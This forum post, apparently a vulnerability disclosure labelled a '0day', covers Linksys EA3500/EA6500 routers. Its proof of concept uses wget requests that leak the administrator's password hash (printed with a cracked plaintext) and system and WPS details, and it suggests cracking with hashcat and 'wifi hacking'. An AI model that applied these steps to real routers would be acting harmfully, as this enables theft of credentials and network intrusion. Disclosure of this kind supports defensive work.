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Linksys 0day

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Linksys Smart Wi-Fi Router EA3500 / EA6500 Vulnerabilities Reply with quote

Product: Linksys Smart Wi-Fi Router EA6500

Firmware: Version 1.1.29 (Build 162351)

Product: Linksys Smart Wi-Fi Router EA3500

Firmware: Version

Vulnerability type: Router password and system private information disclosure!

Severity: High (Critical)

Details: The vulnerability allows an attacker to read system private information, and get MD5(unix) encrypted administrator password, remotely.

Exploitation-Technique (POC):

Target: [url][/url]

#Password disclosure

$ wget [url][/url] > password

$ cat password

admin:$1$HrEMQi7U$/Ci6nHHLzVfMcwCk2mc23/ ( decrypted password: stefani1)

#using brute force tools like hash cat, its possible to decrypt the password

#System disclosure

$ wget [url][/url] > system_information

$ cat system_information



ModelName: EA3500

Firmware Version:

Firmware Builddate: 2012-11-14 10:57

Product.type: production

Linux: Linux version (root@hudson-node) (gcc version 4.2.0 20070413 (prerelease) (CodeSourcery Sourcery G++ Lite 2007q1-21)) #1 Wed Nov 14 02:31:16 PST 2012

Board: audi

-----U-Boot Data-----

fw_printenv bootdelay: bootdelay=0

fw_printenv mtdparts: mtdparts=mtdparts=nand_mtd:512k(uboot)ro,16k@512k(u_env),16k@528k(s_env),20m@2m(



fw_printenv bootcmd: bootcmd=run nandboot

fw_printenv boot_part: boot_part=1....

it shares more information about the system, even it shares wps code, which can be used for wifi hacking.

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